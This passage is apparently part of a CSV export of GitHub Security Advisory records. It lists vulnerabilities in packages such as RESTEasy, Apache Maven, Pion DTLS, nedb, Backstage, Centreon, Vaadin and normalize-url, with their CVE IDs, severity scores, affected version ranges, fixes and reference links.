'https://github.com/reg-viz/reg-suit/releases/tag/v0.10.16'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/reg-keygen-git-hash-plugin'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-08T15:31:31Z', 'nvd_published_at': '2021-06-08T17:15:00Z'}" +1.4.0,GHSA-29qj-rvv6-qrmv,2021-06-01T20:09:20Z,2021-06-15T16:05:22Z,,['CVE-2020-10688'],Cross-site scripting in RESTEasy,"A cross-site scripting (XSS) flaw was found in RESTEasy in versions before 3.11.1.Final and before 4.5.3.Final, where it did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.11.0.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.3.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.2.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.1.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.11.0.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.3.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.5.2.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10688'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/issues/7248'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1814974'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-2519'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210706-0008/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:09:20Z', 'nvd_published_at': '2021-05-27T19:15:00Z'}" +1.4.0,GHSA-2f88-5hg8-9x2x,2023-08-15T17:39:29Z,2021-06-16T17:32:49Z,,['CVE-2021-26291'],Origin Validation Error in Apache Maven,"Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available in the referenced urls. If you are currently using a repository manager to govern the repositories used by your builds, you are unaffected by the risks present in the legacy behavior, and are unaffected by this vulnerability and change to default behavior. See this link for more information about repository management: https://maven.apache.org/repository-management.html","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.maven:maven-compat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.maven:maven-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26291'}, {'type': 'WEB', 'url': 'https://github.com/apache/maven/commit/899465aeec03753ea91e15a79579eab76369c016'}, {'type': 'WEB', 'url': 'https://github.com/apache/maven/commit/fa79cb22e456cc65522b5bab8c4240fe08c5775f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/maven'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/MNG-7116'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/MNG-7117'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0556ce5db7231025785477739ee416b169d8aff5ee9bac7854d64736@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06db4057b74e0598a412734f693a34a8836ac6f06d16d139e5e1027c@%3Cdev.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r07a89b32783f73bda6903c1f9aadeb859e5bef0a4daed6d87db8e4a9@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08a401f8c98a99f68d061fde6e6659d695f28d60fe4f0413bcb355b0@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0a5e4ff2a7ca7ad8595d7683afbaeb3b8788ba974681907f97e7dc8e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0d083314aa3934dd4b6e6970d1f6ee50f6eaa9d867deb2cd96788478@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r30a139c165b3da6e0d5536434ab1550534011b1fdfcd2f5d95892c5b@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r30e9fcba679d164158cc26236704c351954909c18cb2485d11038aa6@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r340e75c9bb6e8661b89e1cf2c52f4638a18312e57bd884722bc28f52@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r39fa6ec4b7e912d3e04ea68efd23e554ec9c8efa2c96f5b45104fc61@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3f0450dcab7e63b5f233ccfbc6fca5f1867a75c8aa2493ea82732381@%3Cdev.jena.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4e1619cfefcd031fac62064a3858f5c9229eef907bd5d8ef14c594fc@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r52c6cda14dc6315dc79e72d30109f4589e9c6300ef6dc1a019da32d4@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r53cd5de57aaa126038c5301d8f518f3defab3c5b1c7e17c97bad08d8@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5ae6aaa8a2ce86145225c3516bb45d315c0454e3765d651527e5df8a@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71bc13669be84c2ff45b74a67929bc2da905c152e12a39b406e3c2a0@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7212b874e575e59d648980d91bc22e684906aee9b211ab92da9591f5@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74329c671df713f61ae4620ee2452a0443ccad7f33c60e8ed7d21ff9@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r77af3ac7c3bfbd5454546e13faf7aec21d627bdcf36c9ca240436b94@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r78fb6d2cf0ca332cfa43abd4471e75fa6c517ed9cdfcb950bff48d40@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86aebd0387ae19b740b3eb28bad83fe6aceca0d6257eaa810a6e0002@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86e1c81e03f441855f127980e9b3d41939d04a7caea2b7ab718e2288@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96cc126d3ee9aa42af9d3bb4baa94828b0a5f656584a50dcc594125f@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a027668558264c4897633e66bcb7784099fdec9f9b22c38c2442f00%40%3Cusers.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a027668558264c4897633e66bcb7784099fdec9f9b22c38c2442f00@%3Cusers.maven.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra88a0eba7f84658cefcecc0143fd8bbad52c229ee5dfcbfdde7b6457@%3Cdev.jena.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9d984eccfd2ae7726671e025f0296bf03786e5cdf872138110ac29b@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc7ae2530063d1cd1cf8e9fa130d10940760f927168d4063d23b8cd0a@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9e441c1576bdc4375d32526d5cf457226928e9c87b9f54ded26271c@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd37d9214b08067a2e8f2b5b4fd123a1f8cb6008698d11ef44028c21@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd6c3a36f1dbc130da1b89d0f320db7040de71661a512695a8d513ac@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdcbad6d8ce72c79827ed8c635f9a62dd919bb21c94a0b64cab2efc31@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re75f8b3dbc5faa1640908f87e644d373e00f8b4e6ba3e2ba4bd2c80b@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/red3bf6cbfd99e36b0c0a4fa1cea1eef1eb300c6bd8f372f497341265@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9abfc0223747a56694825c050cc6b66627a293a32ea926b3de22402@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc0db1f3c375087e69a239f9284ded72d04fbb55849eadde58fa9dc2@%3Cissues.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://maven.apache.org/docs/3.8.1/release-notes.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/resources/blog/maven-security-vulnerability-cve-2021-26291/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/23/5'}]","{'cwe_ids': ['CWE-346'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-26T22:21:03Z', 'nvd_published_at': '2021-04-23T15:15:00Z'}" +1.4.0,GHSA-7gfg-6934-mqq2,2023-02-14T00:18:06Z,2021-06-29T21:34:57Z,,['CVE-2019-20786'],Improper Authenication in Pion DTLS,"handleIncomingPacket in conn.go in Pion DTLS before 1.5.2 lacks a check for application data with epoch 0, which allows remote attackers to inject arbitrary unencrypted data after handshake completion.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pion/dtls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20786'}, {'type': 'WEB', 'url': 'https://github.com/pion/dtls/pull/128'}, {'type': 'WEB', 'url': 'https://github.com/pion/dtls/commit/fd73a5df2ff0e1fb6ae6a51e2777d7a16cc4f4e0'}, {'type': 'PACKAGE', 'url': 'https://github.com/pion/dtls'}, {'type': 'WEB', 'url': 'https://github.com/pion/dtls/compare/v1.5.1...v1.5.2'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0038'}, {'type': 'WEB', 'url': 'https://www.usenix.org/conference/usenixsecurity20/presentation/fiterau-brostean'}, {'type': 'WEB', 'url': 'https://www.usenix.org/system/files/sec20fall_fiterau-brostean_prepub.pdf'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T19:54:18Z', 'nvd_published_at': None}" +1.4.0,GHSA-x3wr-v4wx-5qpc,2022-06-29T20:41:54Z,2021-06-21T17:14:01Z,,['CVE-2021-25948'],Prototype Pollution,Prototype pollution vulnerability in ‘expand-hash’ versions 0.1.0 through 1.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'expand-hash'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25948'}, {'type': 'PACKAGE', 'url': 'https://github.com/doowb/expand-hash'}, {'type': 'WEB', 'url': 'https://github.com/doowb/expand-hash/blob/556913f6c2f05848110b5b8261cfc78e5ce3dc77/index.js#L19'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25948'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:29:17Z', 'nvd_published_at': '2021-06-10T12:15:00Z'}" +1.4.0,GHSA-339j-hqgx-qrrx,2023-08-08T19:57:23Z,2021-06-21T17:13:06Z,,['CVE-2021-23395'],Prototype Pollution in nedb,This affects all versions of package nedb. The library could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor.prototype payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'nedb'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23395'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NEDB-1305279'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T20:12:32Z', 'nvd_published_at': '2021-06-15T20:15:00Z'}" +1.4.0,GHSA-pwhf-39xg-4rxw,2021-06-04T19:23:33Z,2021-06-04T19:09:35Z,,['CVE-2021-32660'],Script injection,"### Impact + +A malicious internal actor is able to upload documentation content with malicious scripts. These scripts would normally be sanitized by the TechDocs frontend, but by tricking a user to visit the content via the TechDocs API, the content sanitazion will be bypassed. If the TechDocs API is hosted on the same origin as the Backstage app or other backend plugins, this may give access to sensitive data. + +The ability to upload malicious content may be limited by internal code review processes, unless the chosen TechDocs deployment method is to use an object store and the actor has access to upload files directly to that store. + +### Patches + +The vulnerability is patched in the `0.6.4` release of `@backstage/techdocs-common`. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/techdocs-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-pwhf-39xg-4rxw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32660'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/aad98c544e59369901fe9e0a85f6357644dceb5c'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/releases/tag/release-2021-06-03'}]","{'cwe_ids': ['CWE-434', 'CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T22:02:53Z', 'nvd_published_at': '2021-06-03T17:15:00Z'}" +1.4.0,GHSA-jmgg-wx67-7qfv,2021-05-20T22:17:17Z,2021-06-22T15:23:33Z,,['CVE-2020-13252'],Command Injection in Centreon,Centreon before 19.04.15 allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (via a main.get.php request) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.04.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13252'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/8467'}, {'type': 'WEB', 'url': 'https://engindemirbilek.github.io/centreon-19.10-rce'}, {'type': 'WEB', 'url': 'https://github.com/EnginDemirbilek/EnginDemirbilek.github.io/blob/master/centreon-19.10-rce.html'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/compare/19.04.13...19.04.15'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:17:17Z', 'nvd_published_at': '2020-05-21T04:15:00Z'}" +1.4.0,GHSA-qrg9-f472-qwfm,2021-06-24T19:46:19Z,2021-06-28T16:55:58Z,,['CVE-2021-31412'],"Possible route enumeration in production mode via RouteNotFoundError view in Vaadin 10, 11-14, and 15-19","Improper sanitization of path in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for `NotFoundException` is provided. + +- https://vaadin.com/security/cve-2021-31412","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.18'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '14.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 14.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '19.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-qrg9-f472-qwfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31412'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/11107'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31412'}]","{'cwe_ids': ['CWE-1295', 'CWE-20', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:46:19Z', 'nvd_published_at': '2021-06-24T12:15:00Z'}" +1.4.0,GHSA-67f6-c8mx-4q2m,2021-05-19T19:47:05Z,2021-06-16T17:21:11Z,,['CVE-2021-32053'],Uncontrolled Resource Consumption in JPA Server in HAPI FHIR,"JPA Server in HAPI FHIR before 5.4.0 allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'ca.uhn.hapi.fhir:hapi-fhir-jpaserver-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32053'}, {'type': 'WEB', 'url': 'https://github.com/hapifhir/hapi-fhir/issues/2641'}, {'type': 'WEB', 'url': 'https://github.com/hapifhir/hapi-fhir/pull/2642'}, {'type': 'WEB', 'url': 'https://hapifhir.io'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:47:05Z', 'nvd_published_at': '2021-05-10T21:15:00Z'}" +1.4.0,GHSA-xpxm-pf7g-2534,2021-05-03T16:41:32Z,2021-06-08T20:11:52Z,,['CVE-2021-31778'],Cross-site scripting in media2click,The media2click (aka 2 Clicks for External Media) extension 1.x before 1.3.3 for TYPO3 allows XSS by a backend user account.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'amazing/media2click'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31778'}, {'type': 'WEB', 'url': 'https://github.com/ghermens/media2click/commit/3c4e413fbc7d35c47212e754c24d5070637a11a3'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/amazing/media2click'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-004'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T16:41:32Z', 'nvd_published_at': '2021-04-28T07:15:00Z'}" +1.4.0,GHSA-g7w8-pp9w-7p32,2021-10-05T17:26:03Z,2021-06-28T16:57:32Z,,[],Creation of order credits was not validated by acl in admin orders,"### Impact +Creation of order credits was not validated by ACL in admin orders + +### Patches +We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-g7w8-pp9w-7p32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32709'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}, {'type': 'WEB', 'url': 'https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/download/#shopware-6'}]","{'cwe_ids': ['CWE-306'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:19:59Z', 'nvd_published_at': None}" +1.4.0,GHSA-jq42-hfch-42f3,2021-10-05T17:22:08Z,2021-06-01T21:20:53Z,,[],Action Commands (run/shell/exec) Against Library URIs Ignore Configured Remote Endpoint,"# Impact +Due to incorrect use of a default URL, `singularity` action commands (`run`/`shell`/`exec`) specifying a container using a `library://` URI will always attempt to retrieve the container from the default remote endpoint (`cloud.sylabs.io`) rather than the configured remote endpoint. + +An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. + +Only action commands (`run`/`shell`/`exec`) against `library://` URIs are affected. Other commands such as `pull` / `push` respect the configured remote endpoint. + +# Patches +All users should upgrade to Singularity 3.7.4 or later. + +# Workarounds +Users who only interact with the default remote endpoint or do not use the library:// url are not affected. + +Installations with an execution control list configured to restrict execution to containers signed with specific secure keys are not affected. + +# Acknowledgements +This issue was found by Mike Frisch and brought to our attention by Sylabs. Sylabs is making a [coordinated disclosure](https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394). + +# For more information +General questions about the impact of the advisory can be asked in the: + +[Singularity Slack Channel](https://join.slack.com/t/hpcng/shared_invite/zt-qda4h1ls-OP0Uouq6sSmVE6i_0NrWdw) +[Singularity Mailing List](https://groups.google.com/a/lbl.gov/g/singularity) +Any sensitive security concerns should be directed to: [singularity-security@hpcng.org](mailto:singularity-security@hpcng.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hpcng/singularity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.2'}, {'fixed': '3.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/singularity/security/advisories/GHSA-jq42-hfch-42f3'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/singularity/security/advisories/GHSA-5mv9-q7fq-9394'}, {'type': 'PACKAGE', 'url': 'https://github.com/hpcng/singularity'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T20:04:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-px4h-xg32-q955,2021-10-27T17:04:15Z,2021-06-08T23:11:43Z,,['CVE-2021-33502'],ReDoS in normalize-url,"The normalize-url package before 4.5.1, 5.x before 5.3.1, and 6.x before 6.0.1 for Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data: URLs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'normalize-url'}, 'ecosystem_specific': {'affected_functions': ['normalize-url']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.5.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'normalize-url'}, 'ecosystem_specific': {'affected_functions': ['normalize-url']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.3.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'normalize-url'}, 'ecosystem_specific': {'affected_functions': ['normalize-url']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33502'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/normalize-url/commit/b1fdb5120b6d27a88400d8800e67ff5a22bd2103'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/normalize-url'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/normalize-url/releases/tag/v6.0.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210706-0001/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': 